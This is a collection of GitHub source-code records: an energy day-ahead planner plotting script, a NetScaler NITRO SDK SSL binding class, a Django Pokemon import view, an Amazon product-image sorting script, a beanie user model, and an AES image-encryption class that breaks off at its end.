sol_planner['long_penalty'] / 1000))\n\n plt.figure()\n plt.plot(sol_planner['x'], 'r', label='planning')\n for s in range(nb_scenarios):\n # plt.plot(solution['y'][0], 'k',label='position')\n net = scenarios['PV'][s] + scenarios['W'][s] - scenarios['L'][s]\n # plt.plot(scenarios['PV'][s] + scenarios['W'][s], 'gray')\n # plt.plot(scenarios['L'][s], 'b')\n # plt.plot(solution['y_s'][0], 'orange',label='y_s')\n plt.plot(net, 'g', label='net=generation-load')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000,2000)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Economic dispatch based on actual realization of uncertainties\n np.random.seed(seed=0)\n # omega = np.random.randint(nb_scenarios, size=nb_scenarios)\n omega = range(nb_scenarios)\n res_O = []\n res_planner = []\n for s in omega:\n # pick a scenario\n scenarios_dispatch = dict()\n scenarios_dispatch['PV'] = scenarios['PV'][s,:].reshape(1, 24)\n scenarios_dispatch['W'] = scenarios['W'][s,:].reshape(1, 24)\n scenarios_dispatch['L'] = scenarios['L'][s,:].reshape(1, 24)\n\n # oracle\n oracle = Planner(scenarios=scenarios_dispatch, prices=prices, soc_max=soc_max)\n oracle.export_model(dir_path + 'planner_dad')\n oracle.solve()\n sol_oracle = oracle.store_solution()\n\n res_O.append(sol_oracle['obj'] / 1000)\n\n dispatch = Planner(scenarios=scenarios_dispatch, prices=prices, x=sol_planner['x'], soc_max=soc_max)\n dispatch.export_model(dir_path + 'dispatch')\n dispatch.solve()\n sol_dispatch = dispatch.store_solution()\n res_planner.append(sol_dispatch['obj'] / 1000)\n\n print('s %s net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (s, sol_dispatch['obj'] / 1000, sol_dispatch['dad_profit'] / 1000, sol_dispatch['short_penalty'] / 1000, sol_dispatch['long_penalty'] / 1000))\n print('oracle net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_oracle['obj'] / 1000, sol_oracle['dad_profit'] / 1000, sol_oracle['short_penalty'] / 1000, sol_oracle['long_penalty'] / 1000))\n net = scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0] - scenarios_dispatch['L'][0]\n\n # plt.figure()\n # plt.plot(sol_oracle['x'], 'b', label='x oracle')\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(str(s) + ' oracle vs planner')\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n #\n # plt.figure()\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.plot(sol_dispatch['y'][0], 'k',label='position')\n # plt.plot(sol_dispatch['y_s'][0], 'orange',label='y_s')\n # # plt.plot(scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0], 'gray', label='generation')\n # # plt.plot(scenarios_dispatch['L'][0], 'b', label='load')\n # plt.plot(net, 'g', label='net=generation-load')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(s)\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n\n plt.figure()\n plt.plot(res_O, 'r', label='oracle')\n plt.plot(res_planner, 'k', label='planner')\n plt.ylabel('k€', fontsize=FONTSIZE, rotation='horizontal')\n plt.xlabel('scenarios', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000, 1200)\n plt.xticks(fontsize=FONTSIZE)\n 
plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n print('O %.2f planner %.2f' %(sum(res_O), sum(res_planner)))","repo_name":"jonathandumas/generative-models","sub_path":"GEFcom2014/forecast_value/dad_planner.py","file_name":"dad_planner.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"}
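The MILP above maximizes day-ahead revenue minus the expected two-price imbalance penalty; the y_short/y_long variables just linearize the positive parts (x - y)+ and (y - x)+. For a fixed bid x the objective can be evaluated directly, which is handy for sanity-checking solver output. A NumPy sketch with made-up prices and scenarios (all numbers hypothetical):

import numpy as np

def expected_profit(x, y_scenarios, dad, imb_neg, imb_pos):
    """Day-ahead revenue minus expected two-price imbalance penalties.

    x:           committed bid per period, shape (T,)
    y_scenarios: realized net positions, shape (S, T)
    """
    short = np.maximum(x - y_scenarios, 0.0)  # under-delivery (x - y)+
    long_ = np.maximum(y_scenarios - x, 0.0)  # over-delivery  (y - x)+
    penalty = (imb_neg * short + imb_pos * long_).sum(axis=1).mean()
    return float((dad * x).sum() - penalty)

dad = np.full(24, 100.0)  # euros/MWh, hypothetical
y = np.random.default_rng(0).uniform(200.0, 400.0, size=(5, 24))
print(expected_profit(y.mean(axis=0), y, dad, 2 * dad, 2 * dad))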
+{"seq_id":"2623659504","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslcertkey_sslocspresponder_binding(base_resource) :\n\t\"\"\" Binding class showing the sslocspresponder that can be bound to sslcertkey.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._ocspresponder = None\n\t\tself._priority = None\n\t\tself._certkey = None\n\t\tself._ca = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ca(self) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ca.setter\n\tdef ca(self, ca) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ca = ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef certkey(self) :\n\t\tr\"\"\"Name of the certificate-key pair. Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@certkey.setter\n\tdef certkey(self, certkey) :\n\t\tr\"\"\"Name of the certificate-key pair. 
Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._certkey = certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ocspresponder(self) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ocspresponder.setter\n\tdef ocspresponder(self, ocspresponder) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ocspresponder = ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslcertkey_sslocspresponder_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslcertkey_sslocspresponder_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.certkey is not None :\n\t\t\t\treturn str(self.certkey)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tupdateresource.certkey = resource.certkey\n\t\t\t\tupdateresource.ocspresponder = resource.ocspresponder\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tupdateresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tdeleteresource.certkey = resource.certkey\n\t\t\t\tdeleteresource.ocspresponder = resource.ocspresponder\n\t\t\t\tdeleteresource.ca = resource.ca\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tdeleteresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tdeleteresources[i].ca = resource[i].ca\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, certkey=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch 
sslcertkey_sslocspresponder_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not certkey :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tobj.certkey = certkey\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to fetch the filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, certkey) :\n\t\tr\"\"\" Use this API to count sslcertkey_sslocspresponder_binding resources configured on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\nclass sslcertkey_sslocspresponder_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslcertkey_sslocspresponder_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslcertkey_sslocspresponder_binding = [sslcertkey_sslocspresponder_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslcertkey_sslocspresponder_binding.py","file_name":"sslcertkey_sslocspresponder_binding.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
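The generated binding class above is driven through a NITRO client session. The sketch below shows the typical count/get round trip; the nitro_service import path follows the SDK layout used in this record, while the address, credentials, and certkey name are hypothetical.

from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service

client = nitro_service("10.0.0.1", "http")  # hypothetical NetScaler address
client.login("nsroot", "nsroot")            # hypothetical credentials

# how many OCSP responders are bound to this certificate-key pair?
n = sslcertkey_sslocspresponder_binding.count(client, "my-certkey")
if n > 0:
    bindings = sslcertkey_sslocspresponder_binding.get(client, "my-certkey")
    for b in bindings:
        print(b.ocspresponder, b.priority)

client.logout()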
+{"seq_id":"12933681684","text":"import json\nfrom django.http import JsonResponse\nfrom api.models.pokemon import Pokemon\nfrom rest_framework import viewsets, permissions\nfrom api.serializers.pokemon import PokemonSerializer\n\n\ndef store_pokemon(request):\n    with open(\"sample.json\", \"r\") as json_file:\n        pokemon_list = json.load(json_file)\n        for key, value in pokemon_list.items():\n            print(key)\n            pokemon = Pokemon(\n                name=value[\"name\"].title(),\n                pokedex_entry=value[\"id\"],\n                type=value[\"type\"],\n                default_sprite=value[\"default_sprite\"],\n                shiny_sprite=value[\"shiny_sprite\"],\n            )\n            pokemon.save()\n    # http.client.HTTPResponse cannot be constructed from a dict; Django's JsonResponse is the intended return type\n    return JsonResponse({'status': 200})\n","repo_name":"JaycobDuffel/pokedex-mobile-app","sub_path":"pokedex-api/api/api/views/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
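The view above issues one INSERT per loop iteration; Django can batch them with bulk_create. A hedged variant of the same view (field names as in the record, the function name is new):

import json
from django.http import JsonResponse
from api.models.pokemon import Pokemon

def store_pokemon_bulk(request):
    """Sketch: same import as store_pokemon, but batched into one query."""
    with open("sample.json", "r") as json_file:
        pokemon_list = json.load(json_file)
    Pokemon.objects.bulk_create(
        Pokemon(
            name=value["name"].title(),
            pokedex_entry=value["id"],
            type=value["type"],
            default_sprite=value["default_sprite"],
            shiny_sprite=value["shiny_sprite"],
        )
        for value in pokemon_list.values()
    )
    return JsonResponse({"status": 200})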
+{"seq_id":"23870064981","text":"'''\n1. Important keys of each product:\n - `bullet_point`\n - Content: Important features of the products\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `color`\n - Content: Color of the product as text\n - Format: `[{\"language_tag\": , \"standardized_values\": [],\n \"value\": }, ...]`\n - `country`\n - Content: Country of the marketplace, as an\n [ISO 3166-1 alpha 2](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)\n code\n - Format: ``\n - `domain_name`\n - Content: Domain name of the marketplace where the product is found.\n A product listing in this collection is uniquely identified by\n (`item_id`, `domain_name`)\n - Format: ``\n - `item_dimensions`\n - Content: Dimensions of the product (height, width, length)\n - Format: `{\"height\": {\"normalized_value\": {\"unit\": , \"value\":\n }, \"unit\": , \"value\": }, \"length\":\n {\"normalized_value\": {\"unit\": , \"value\": }, \"unit\": ,\n \"value\": }, \"width\": {\"normalized_value\": {\"unit\": ,\n \"value\": }, \"unit\": , \"value\": }}}`\n - `item_id`\n - Content: The product reference id. A product listing in this\n collection is uniquely identified by (`item_id`, `domain_name`).\n A corresponding product page may exist at\n `https://www./dp/`\n - Format: ``\n - `item_keywords`\n - Content: Keywords for the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_name`\n - Content: The product name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_shape`\n - Content: Description of the product shape\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_weight`\n - Content: The product weight\n - Format: `[{\"normalized_value\": {\"unit\": , \"value\": },\n \"unit\": , \"value\": }, ...]`\n - `main_image_id`\n - Content: The main product image, provided as an `image_id`. See the\n descripton of `images/metadata/images.csv.gz` below\n - Format: ``\n - `material`\n - Content: Description of the product material\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `model_name`\n - Content: Model name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `pattern`\n - Content: Product pattern\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_description`\n - Content: Product description as HTML \n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_type`\n - Content: Product type (category)\n - Format: ``\n - `style`\n - Content: Style of the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n \n2. A datasample of a product:\n {\"item_dimensions\": \n {\"height\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"length\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"width\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 1.5}, \"unit\": \"inches\", \"value\": 1.5}}, \n \"bullet_point\": [\n {\"language_tag\": \"en_US\", \"value\": \"These vintage lawn chairs may have seen better days, but they have obviously had a rebirth. Brightly painted, they've been repurposed as the hub of hang-out spot outside a warehouse. 
This colorful urban-look piece will add a bright spot to any room.\"}, \n {\"language_tag\": \"en_US\", \"value\": \"A modern colorful print with a vintage twist\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Printed on wood, framed in a white-painted wood frame\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\" x 12\\\"\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Made to order\"}], \n \"color\": [\n {\"language_tag\": \"en_US\", \"standardized_values\": [\"Multi\"], \"value\": \"Multicolor\"}], \n \"item_id\": \"B073P5PZ5P\", \n \"item_name\": [\n {\"language_tag\": \"zh_CN\", \"value\": \"Rivet \\u590d\\u53e4\\u84dd\\u8272\\u9ec4\\u8272\\u548c\\u7eff\\u8272\\u6905\\u5b50 \\u9ed1\\u8272\\u6728\\u6846\\u5899\\u58c1\\u827a\\u672f\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Amazon Brand \\u2013 Rivet Vintage Blue Yellow and Green Chairs in White Wood Frame Wall Art, 12\\\" x 12\\\"\"}], \n \"item_weight\": [{\"normalized_value\": {\"unit\": \"pounds\", \"value\": 2.5}, \"unit\": \"pounds\", \"value\": 2.5}], \n \"model_number\": [{\"value\": \"16523-frwa30\"}], \n \"product_type\": [{\"value\": \"HOME\"}], \n \"style\": [{\"language_tag\": \"en_US\", \"value\": \"White\"}], \n \"main_image_id\": \"91e1hw35cDL\", \n \"item_keywords\": [\n {\"language_tag\": \"en_US\", \"value\": \"framed-prints\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"canvas wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"bathroom decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"posters\"}, \n {\"language_tag\": \"en_US\", \"value\": \"framed wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decorations for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"living room decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"cuadros de pared de sala\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Rivet\"}, \n {\"language_tag\": \"en_US\", \"value\": \"mid century\"}, \n {\"language_tag\": \"en_US\", \"value\": \"modern\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\"x12\\\"\"}], \n \"country\": \"US\", \n \"domain_name\": \"amazon.com\"\n'''\nimport json\nimport os\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndata_root = '/media/hxd/82231ee6-d2b3-4b78-b3b4-69033720d8a8/MyDatasets/amazon'\nattr = 'color' # product_type\nmax_num_values_per_attr = 25\n\n# load product\nproducts = []\njson_files = glob.glob(data_root + '/metadata/*.json')\nfor json_file in json_files:\n for line in open(json_file, 'r'):\n products.append(json.loads(line))\n# load image\nimg_info = pd.read_csv(data_root + '/images.csv')\n\nflag_auto_attr_value = True\nif not flag_auto_attr_value:\n ## (1) manually define attribute values\n attr_list = {\n 'color':['Black', 'White', 'Blue', 'Brown', 'Gray', 'Orange', 'Red', 'Yellow', 'Pink', 'Silver', 'Bronze', 'Cream', 'Walnut'], \n 'material':['Leather', 'Metal', 'Plastic', 'Glass', 'Rubber', 'Stoneware', 'Wood', 'Fabric', 'Memory_foam'],\n 'item_shape':['Rectangular', 'Ellipsoidal', 'Cubic', 'Round', 'Long', 'L-Shape'],\n 'style':['Modern', 'Contemporary', 'Traditional', 'Classic']}\n att_values = attr_list[attr]\n att_values = [x.lower() for x in att_values]\nelse:\n ## (2) obtain attribute 
values by frequency\n tmp_dic = {}\n for product in products:\n if attr in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in tmp_dic.keys():\n tmp_dic[att_value] += 1\n else:\n tmp_dic[att_value] = 1\n\n top_values = dict(sorted(tmp_dic.items(), key=lambda item: item[1], reverse=True))\n att_values = list(top_values.keys())#[:max_num_values_per_attr]\n\nfor value in att_values:\n if not os.path.exists(data_root + '/img_by_attr/' + attr + '/' + value):\n os.makedirs(data_root + '/img_by_attr/' + attr + '/' + value)\n\n\nproduct_descr = {}\nfor product in products:\n description = []\n # if product['country'] == 'US' and \\\n if attr in product.keys() and \\\n 'main_image_id' in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in att_values:\n img_id = product['main_image_id']\n img_path = img_info.loc[img_info['image_id'] == img_id]['path'].values[0]\n img = cv2.imread(data_root + '/small/' + img_path)\n cv2.imwrite(data_root + '/img_by_attr/' + attr + '/' + att_value + '/' + img_id + '.jpg', img)\n if 'bullet_point' in product.keys():\n description = [x['value'] for x in product['bullet_point'] if x['language_tag'] == 'en_US']\n product_descr[img_id] = description\n\nwith open(data_root + '/img_by_attr/' + attr + '/product_description.json', 'w') as json_file:\n json.dump(product_descr, json_file)","repo_name":"xiaodanhu/AttDiscovery","sub_path":"amazon/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
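The frequency table in the script above is built by hand with a dict; collections.Counter expresses the same "top attribute values in en_US" pass more compactly. A sketch over the record's products structure:

from collections import Counter

def top_attribute_values(products, attr, k=25):
    """Most frequent en_US values of one attribute across all products."""
    counts = Counter()
    for product in products:
        values = [e["value"] for e in product.get(attr, [])
                  if attr == "product_type" or e.get("language_tag") == "en_US"]
        if values:
            counts[values[0].lower()] += 1
    return [value for value, _ in counts.most_common(k)]

# e.g. top_attribute_values(products, "color") -> ["black", "white", ...]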
+{"seq_id":"29489222118","text":"from beanie import Document, Link\nfrom pydantic import BaseModel, EmailStr\nfrom typing import Optional, List\nfrom models.event import Event\n\nclass User(Document):\n    email: EmailStr\n    password: str\n    events: Optional[List[Link[Event]]]\n\n    class Settings:\n        name = \"users\"\n\n    class Config:\n        json_schema_extra = {\n            \"example\": {\n                \"email\": \"user@mail.com\",\n                \"password\": \"examplepassword\",\n                \"events\": [],\n            }\n        }\n\nclass TokenResponse(BaseModel):\n    access_token: str\n    token_type: str\n\n    class Config:\n        json_schema_extra = {\n            \"example\": {\n                \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlcjFAbWFpbC5jb20iLCJleHBpcmVzIjoxNjk2MTE1NzAwLjMzNzg4MX0.eJyZzDExjS1R4GCOSu5J5JQWgc7yJnisAWoGWY9B3uU\",\n                \"token_type\": \"Bearer\",\n            }\n        }","repo_name":"duvg/planner","sub_path":"models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16615202396","text":"import io\nimport sys\nfrom pathlib import Path\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nfrom PIL import Image\n\n\nclass EncryptAES:\n def __init__(self, encrypt_mode):\n self._mode = encrypt_mode\n self._key = Random.new().read(AES.block_size)\n self._iv = self._key\n\n key_path = Path(__file__).parent / 'key.txt'\n with open(key_path, 'wb') as f:\n f.write(self._key)\n\n def encrypt(self, plain_text):\n if self._mode == ECB:\n self._ecb_encrypt(plain_text=plain_text)\n elif self._mode == CBC:\n self._cbc_encrypt(plain_text=plain_text)\n elif self._mode == CUSTOM:\n self._custom_encrypt(plain_text=plain_text)\n\n def _ecb_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n cipher_block = cipher.encrypt(block)\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _cbc_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n prev_ct = cipher_block\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _custom_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n # cast key to bin\n binKey = bin(int.from_bytes(self._key, byteorder=sys.byteorder))[2:]\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n\n if(binKey[int((block_index/AES.block_size)%len(binKey))] == '0'):\n prev_ct = cipher_block\n else:\n prev_ct = cipher_block[1:] + b'\\x00'\n\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n @staticmethod\n def _write_image(cipher_text):\n ppm_path = Path(__file__).parent / 'result.ppm'\n with open(ppm_path, \"wb\") as f:\n f.write(cipher_text)\n\n ppm_picture = ppm_path\n output_img = Image.open(ppm_picture)\n\n result_path = Path(__file__).parent / 'result.png'\n output_img.save(result_path, 'png')\n\n\ndef 
